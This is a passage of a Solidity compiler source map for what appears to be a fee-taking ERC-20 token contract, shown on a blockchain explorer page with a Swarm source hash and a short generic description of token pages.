::0;:::o;29915:167::-;29993:4;30010:42;30020:12;:10;:12::i;:::-;30034:9;30045:6;30010:9;:42::i;:::-;30070:4;30063:11;;29915:167;;;;:::o;31362:137::-;14682:12;:10;:12::i;:::-;14672:22;;:6;;;;;;;;;;:22;;;14664:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31483:8:::1;31453:18;:27;31472:7;31453:27;;;;;;;;;;;;;;;;:38;;;;;;;;;;;;;;;;;;31362:137:::0;;:::o;48461:211::-;14682:12;:10;:12::i;:::-;14672:22;;:6;;;;;;;;;;:22;;;14664:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;48565:1:::1;48549:12;:17;;:39;;;;;48586:2;48570:12;:18;;48549:39;48541:84;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;48652:12;48636:13;:28;;;;48461:211:::0;:::o;41650:148::-;14682:12;:10;:12::i;:::-;14672:22;;:6;;;;;;;;;;:22;;;14664:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41768:22:::1;41744:21;;:46;;;;;;;;;;;;;;;;;;41650:148:::0;:::o;30090:143::-;30171:7;30198:11;:18;30210:5;30198:18;;;;;;;;;;;;;;;:27;30217:7;30198:27;;;;;;;;;;;;;;;;30191:34;;30090:143;;;;:::o;15396:244::-;14682:12;:10;:12::i;:::-;14672:22;;:6;;;;;;;;;;:22;;;14664:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15505:1:::1;15485:22;;:8;:22;;;;15477:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15595:8;15566:38;;15587:6;::::0;::::1;;;;;;;;15566:38;;;;;;;;;;;;15624:8;15615:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;15396:244:::0;:::o;41483:159::-;14682:12;:10;:12::i;:::-;14672:22;;:6;;;;;;;;;;:22;;;14664:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41535:26:::1;41564:21;41535:50;;41596:38;41615:18;41596;:38::i;:::-;14742:1;41483:159::o:0;47947:110::-;47993:15;48028:21;48021:28;;47947:110;:::o;283:106::-;336:15;371:10;364:17;;283:106;:::o;35153:337::-;35263:1;35246:19;;:5;:19;;;;35238:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35344:1;35325:21;;:7;:21;;;;35317:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35428:6;35398:11;:18;35410:5;35398:18;;;;;;;;;;;;;;;:27;35417:7;35398:27;;;;;;;;;;;;;;;:36;;;;35466:7;35450:32;;35459:5;35450:32;;;35475:6;35450:32;;;;;;;;;;;;;;;;;;35153:337;;;:::o;35498:3062::-;35613:1;35595:20;;:6;:20;;;;35587:70;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35697:1;35676:23;;:9;:23;;;;35668:71;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35767:1;35758:6;:10;35750:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35838:17;:25;35856:6;35838:25;;;;;;;;;;;;;;;;;;;;;;;;;35835:1017;;;35876:28;35907:24;35925:4;35907:9;:24::i;:::-;35876:55;;35971:12;;35947:20;:36;35944:112;;36032:12;;36009:35;;35944:112;36068:24;36119:30;;36095:20;:54;;36068:81;;36165:16;;;;;;;;;;;36164:17;:42;;;;;36185:21;;;;;;;;;;;36164:42;:65;;;;;36210:19;36164:65;:92;;;;;36243:13;36233:23;;:6;:23;;;;36164:92;36160:258;;;36296:30;;36273:53;;36370:36;36385:20;36370:14;:36::i;:::-;36160:258;36491:12;36506:4;36491:19;;36610:18;:26;36629:6;36610:26;;;;;;;;;;;;;;;;;;;;;;;;;:59;;;;36640:18;:29;36659:9;36640:29;;;;;;;;;;;;;;;;;;;;;;;;;36610:59;36607:105;;;36695:5;36685:15;;36607:105;36785:59;36800:6;36808:18;;;;;;;;;;;36828:6;36836:7;36785:14;:59::i;:::-;35835:1017;;;;36878:7;:5;:7::i;:::-;36868:17;;:6;:17;;;;:44;;;;;36899:13;36889:23;;:6;:23;;;;36868:44;36864:435;;;36948:12;;36938:6;:22;;36930:75;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;37223:12;;37187:32;37212:6;37187:20;37197:9;37187;:20::i;:::-;:24;;:32;;;;:::i;:::-;:48;;37179:108;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36864:435;37593:28;37624:24;37642:4;37624:9;:24::i;:::-;37593:55;;37688:12;;37664:20;:36;37661:112;;37749:12;;37726:35;;37661:112;37785:24;37836:30;;37812:20;:54;;37785:81;;37882:16;;;;;;;;;;;37881:17;:42;;;;;37902:21;;;;;;;;;;;37881:42;:65;;;;;37927:19;37881:65;:92;;;;;37960:13;37950:23;;:6;:23;;;;37881:92;37877:258;;;38013:30;;37990:53;;38087:36;38102:20;38087:14;:36::i;:::-;37877:258;38208:12;38223:4;38208:19;;38327:18;:26;38346:6;38327:26;;;;;;;;;;;;;;;;;;;;;;;;;:59;;;;38357:18;:29;38376:9;38357:29;;;;;;;;;;;;;;;;;;;;;;;;;38327:59;38324:105;;;38412:5;38402:15;;38324:105;38502:50;38517:6;38525:9;38536:6;38544:7;38502:14;:50::i;:::-;35498:3062;;;;;;:::o;4370:192::-;4456:7;4489:1;4484;:6;;4492:12;4476:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4516:9;4532:1;4528;:5;4516:17;;4553:1;4546:8;;;4370:192;;;;;:::o;47017:163::-;47058:7;47079:15;47096;47115:19;:17;:19::i;:::-;47078:56;;;;47152:20;47164:7;47152;:11;;:20;;;;:::i;:::-;47145:27;;;;47017:163;:::o;5748:132::-;5806:7;5833:39;5837:1;5840;5833:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;5826:46;;5748:132;;;;:::o;3485:181::-;3543:7;3563:9;3579:1;3575;:5;3563:17;;3604:1;3599;:6;;3591:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3657:1;3650:8;;;3485:181;;;;:::o;45712:518::-;45771:7;45780;45789;45798;45807;45816;45837:23;45862:12;45876:30;45910:63;45922:7;45931;;45940:32;45958:13;;45940;;:17;;:32;;;;:::i;:::-;45910:11;:63::i;:::-;45836:137;;;;;;45984:19;46006:10;:8;:10::i;:::-;45984:32;;46028:15;46045:23;46070:12;46086:39;46098:7;46107:4;46113:11;46086;:39::i;:::-;46027:98;;;;;;46144:7;46153:15;46170:4;46176:15;46193:4;46199:22;46136:86;;;;;;;;;;;;;;;;;;;45712:518;;;;;;;:::o;3940:136::-;3998:7;4025:43;4029:1;4032;4025:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4018:50;;3940:136;;;;:::o;39897:589::-;40023:21;40061:1;40047:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;40023:40;;40092:4;40074;40079:1;40074:7;;;;;;;;;;;;;:23;;;;;;;;;;;40118:15;:20;;;:22;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;40108:4;40113:1;40108:7;;;;;;;;;;;;;:32;;;;;;;;;;;40153:62;40170:4;40185:15;40203:11;40153:8;:62::i;:::-;40254:15;:66;;;40335:11;40361:1;40405:4;40432;40452:15;40254:224;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39897:589;;:::o;41015:106::-;41077:18;;;;;;;;;;;:27;;:35;41105:6;41077:35;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41015:106;:::o;38568:1321::-;25645:4;25626:16;;:23;;;;;;;;;;;;;;;;;;38653:19:::1;38675:77;38719:32;38737:13;;38719;;:17;;:32;;;;:::i;:::-;38675:39;38700:13;;38675:20;:24;;:39;;;;:::i;:::-;:43;;:77;;;;:::i;:::-;38653:99;;38763:17;38783:37;38808:11;38783:20;:24;;:37;;;;:::i;:::-;38763:57;;38884:12;38899:16;38913:1;38899:9;:13;;:16;;;;:::i;:::-;38884:31;;38926:17;38946:19;38960:4;38946:9;:13;;:19;;;;:::i;:::-;38926:39;;39243:22;39268:21;39243:46;;39334:20;39357:21;39366:11;39357:4;:8;;:21;;;;:::i;:::-;39334:44;;39389:30;39406:12;39389:16;:30::i;:::-;39550:16;39569:41;39595:14;39569:21;:25;;:41;;;;:::i;:::-;39550:60;;39621:18;39642:36;39665:12;39642:18;39655:4;39642:8;:12;;:18;;;;:::i;:::-;:22;;:36;;;;:::i;:::-;39621:57;;39728:35;39741:9;39752:10;39728:12;:35::i;:::-;39781:43;39796:4;39802:10;39814:9;39781:43;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39837:44;39856:24;39869:10;39856:8;:12;;:24;;;;:::i;:::-;39837:18;:44::i;:::-;25660:1;;;;;;;;25691:5:::0;25672:16;;:24;;;;;;;;;;;;;;;;;;38568:1321;:::o;41806:819::-;41918:7;41914:40;;41940:14;:12;:14::i;:::-;41914:40;41971:11;:19;41983:6;41971:19;;;;;;;;;;;;;;;;;;;;;;;;;:46;;;;;41995:11;:22;42007:9;41995:22;;;;;;;;;;;;;;;;;;;;;;;;;41994:23;41971:46;41967:597;;;42034:48;42056:6;42064:9;42075:6;42034:21;:48::i;:::-;41967:597;;;42105:11;:19;42117:6;42105:19;;;;;;;;;;;;;;;;;;;;;;;;;42104:20;:46;;;;;42128:11;:22;42140:9;42128:22;;;;;;;;;;;;;;;;;;;;;;;;;42104:46;42100:464;;;42167:46;42187:6;42195:9;42206:6;42167:19;:46::i;:::-;42100:464;;;42236:11;:19;42248:6;42236:19;;;;;;;;;;;;;;;;;;;;;;;;;42235:20;:47;;;;;42260:11;:22;42272:9;42260:22;;;;;;;;;;;;;;;;;;;;;;;;;42259:23;42235:47;42231:333;;;42299:44;42317:6;42325:9;42336:6;42299:17;:44::i;:::-;42231:333;;;42365:11;:19;42377:6;42365:19;;;;;;;;;;;;;;;;;;;;;;;;;:45;;;;;42388:11;:22;42400:9;42388:22;;;;;;;;;;;;;;;;;;;;;;;;;42365:45;42361:203;;;42427:48;42449:6;42457:9;42468:6;42427:21;:48::i;:::-;42361:203;;;42508:44;42526:6;42534:9;42545:6;42508:17;:44::i;:::-;42361:203;42231:333;42100:464;41967:597;42580:7;42576:41;;42602:15;:13;:15::i;:::-;42576:41;41806:819;;;;:::o;47188:555::-;47238:7;47247;47267:15;47285:7;;47267:25;;47303:15;47321:7;;47303:25;;47344:9;47339:289;47363:9;:16;;;;47359:1;:20;47339:289;;;47429:7;47405;:21;47413:9;47423:1;47413:12;;;;;;;;;;;;;;;;;;;;;;;;;47405:21;;;;;;;;;;;;;;;;:31;:66;;;;47464:7;47440;:21;47448:9;47458:1;47448:12;;;;;;;;;;;;;;;;;;;;;;;;;47440:21;;;;;;;;;;;;;;;;:31;47405:66;47401:97;;;47481:7;;47490;;47473:25;;;;;;;;;47401:97;47523:34;47535:7;:21;47543:9;47553:1;47543:12;;;;;;;;;;;;;;;;;;;;;;;;;47535:21;;;;;;;;;;;;;;;;47523:7;:11;;:34;;;;:::i;:::-;47513:44;;47582:34;47594:7;:21;47602:9;47612:1;47602:12;;;;;;;;;;;;;;;;;;;;;;;;;47594:21;;;;;;;;;;;;;;;;47582:7;:11;;:34;;;;:::i;:::-;47572:44;;47381:3;;;;;;;47339:289;;;;47652:20;47664:7;;47652;;:11;;:20;;;;:::i;:::-;47642:7;:30;47638:61;;;47682:7;;47691;;47674:25;;;;;;;;47638:61;47718:7;47727;47710:25;;;;;;47188:555;;;:::o;6365:278::-;6451:7;6483:1;6479;:5;6486:12;6471:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6510:9;6526:1;6522;:5;;;;;;6510:17;;6634:1;6627:8;;;6365:278;;;;;:::o;46238:429::-;46345:7;46354;46363;46383:12;46398:28;46422:3;46398:19;46410:6;46398:7;:11;;:19;;;;:::i;:::-;:23;;:28;;;;:::i;:::-;46383:43;;46437:30;46470:43;46509:3;46470:34;46482:21;46470:7;:11;;:34;;;;:::i;:::-;:38;;:43;;;;:::i;:::-;46437:76;;46524:23;46550:44;46572:21;46550:17;46562:4;46550:7;:11;;:17;;;;:::i;:::-;:21;;:44;;;;:::i;:::-;46524:70;;46613:15;46630:4;46636:22;46605:54;;;;;;;;;46238:429;;;;;;;:::o;46675:334::-;46770:7;46779;46788;46808:15;46826:24;46838:11;46826:7;:11;;:24;;;;:::i;:::-;46808:42;;46861:12;46876:21;46885:11;46876:4;:8;;:21;;;;:::i;:::-;46861:36;;46908:23;46934:17;46946:4;46934:7;:11;;:17;;;;:::i;:::-;46908:43;;46970:7;46979:15;46996:4;46962:39;;;;;;;;;46675:334;;;;;;;:::o;4812:471::-;4870:7;5120:1;5115;:6;5111:47;;;5145:1;5138:8;;;;5111:47;5170:9;5186:1;5182;:5;5170:17;;5215:1;5210;5206;:5;;;;;;:10;5198:56;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5274:1;5267:8;;;4812:471;;;;;:::o;40494:513::-;40642:62;40659:4;40674:15;40692:11;40642:8;:62::i;:::-;40747:15;:31;;;40786:9;40819:4;40839:11;40865:1;40908;40951:7;:5;:7::i;:::-;40973:15;40747:252;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;40494:513;;:::o;34501:332::-;34558:1;34547:7;;:12;:34;;;;;34580:1;34563:13;;:18;34547:34;:56;;;;;34602:1;34585:13;;:18;34547:56;34544:68;;;34605:7;;34544:68;34642:7;;34624:15;:25;;;;34684:13;;34660:21;:37;;;;34732:13;;34708:21;:37;;;;34768:1;34758:7;:11;;;;34796:1;34780:13;:17;;;;34824:1;34808:13;:17;;;;34501:332;:::o;43780:590::-;43883:15;43900:23;43925:12;43939:23;43964:12;43978:27;44009:19;44020:7;44009:10;:19::i;:::-;43882:146;;;;;;;;;;;;44057:28;44077:7;44057;:15;44065:6;44057:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;44039:7;:15;44047:6;44039:15;;;;;;;;;;;;;;;:46;;;;44114:28;44134:7;44114;:15;44122:6;44114:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;44096:7;:15;44104:6;44096:15;;;;;;;;;;;;;;;:46;;;;44174:39;44197:15;44174:7;:18;44182:9;44174:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;44153:7;:18;44161:9;44153:18;;;;;;;;;;;;;;;:60;;;;44224:44;44248:19;44224:23;:44::i;:::-;44279:23;44291:4;44297;44279:11;:23::i;:::-;44335:9;44318:44;;44327:6;44318:44;;;44346:15;44318:44;;;;;;;;;;;;;;;;;;43780:590;;;;;;;;;:::o;43170:602::-;43271:15;43288:23;43313:12;43327:23;43352:12;43366:27;43397:19;43408:7;43397:10;:19::i;:::-;43270:146;;;;;;;;;;;;43445:28;43465:7;43445;:15;43453:6;43445:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;43427:7;:15;43435:6;43427:15;;;;;;;;;;;;;;;:46;;;;43505:39;43528:15;43505:7;:18;43513:9;43505:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;43484:7;:18;43492:9;43484:18;;;;;;;;;;;;;;;:60;;;;43576:39;43599:15;43576:7;:18;43584:9;43576:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;43555:7;:18;43563:9;43555:18;;;;;;;;;;;;;;;:60;;;;43626:44;43650:19;43626:23;:44::i;:::-;43681:23;43693:4;43699;43681:11;:23::i;:::-;43737:9;43720:44;;43729:6;43720:44;;;43748:15;43720:44;;;;;;;;;;;;;;;;;;43170:602;;;;;;;;;:::o;42633:529::-;42732:15;42749:23;42774:12;42788:23;42813:12;42827:27;42858:19;42869:7;42858:10;:19::i;:::-;42731:146;;;;;;;;;;;;42906:28;42926:7;42906;:15;42914:6;42906:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;42888:7;:15;42896:6;42888:15;;;;;;;;;;;;;;;:46;;;;42966:39;42989:15;42966:7;:18;42974:9;42966:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;42945:7;:18;42953:9;42945:18;;;;;;;;;;;;;;;:60;;;;43016:44;43040:19;43016:23;:44::i;:::-;43071:23;43083:4;43089;43071:11;:23::i;:::-;43127:9;43110:44;;43119:6;43110:44;;;43138:15;43110:44;;;;;;;;;;;;;;;;;;42633:529;;;;;;;;;:::o;44378:661::-;44481:15;44498:23;44523:12;44537:23;44562:12;44576:27;44607:19;44618:7;44607:10;:19::i;:::-;44480:146;;;;;;;;;;;;44655:28;44675:7;44655;:15;44663:6;44655:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;44637:7;:15;44645:6;44637:15;;;;;;;;;;;;;;;:46;;;;44712:28;44732:7;44712;:15;44720:6;44712:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;44694:7;:15;44702:6;44694:15;;;;;;;;;;;;;;;:46;;;;44772:39;44795:15;44772:7;:18;44780:9;44772:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;44751:7;:18;44759:9;44751:18;;;;;;;;;;;;;;;:60;;;;44843:39;44866:15;44843:7;:18;44851:9;44843:18;;;;;;;;;;;;;;;;:22;;:39;;;;:::i;:::-;44822:7;:18;44830:9;44822:18;;;;;;;;;;;;;;;:60;;;;44893:44;44917:19;44893:23;:44::i;:::-;44948:23;44960:4;44966;44948:11;:23::i;:::-;45004:9;44987:44;;44996:6;44987:44;;;45015:15;44987:44;;;;;;;;;;;;;;;;;;44378:661;;;;;;;;;:::o;34841:173::-;34895:15;;34885:7;:25;;;;34937:21;;34921:13;:37;;;;34985:21;;34969:13;:37;;;;34841:173::o;45047:408::-;45128:19;45150:10;:8;:10::i;:::-;45128:32;;45171:27;45201:36;45225:11;45201:19;:23;;:36;;;;:::i;:::-;45171:66;;45273:47;45300:19;45273:7;:22;45289:4;45273:22;;;;;;;;;;;;;;;;:26;;:47;;;;:::i;:::-;45248:7;:22;45264:4;45248:22;;;;;;;;;;;;;;;:72;;;;45334:11;:26;45354:4;45334:26;;;;;;;;;;;;;;;;;;;;;;;;;45331:116;;;45400:47;45427:19;45400:7;:22;45416:4;45400:22;;;;;;;;;;;;;;;;:26;;:47;;;;:::i;:::-;45375:7;:22;45391:4;45375:22;;;;;;;;;;;;;;;:72;;;;45331:116;45047:408;;;:::o;45463:147::-;45541:17;45553:4;45541:7;;:11;;:17;;;;:::i;:::-;45531:7;:27;;;;45582:20;45597:4;45582:10;;:14;;:20;;;;:::i;:::-;45569:10;:33;;;;45463:147;;:::o
Swarm Source
ipfs://e175cea11c3dae489dc6f00f354d97a19b068c505a3289c3edbe78e5293a70c8
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.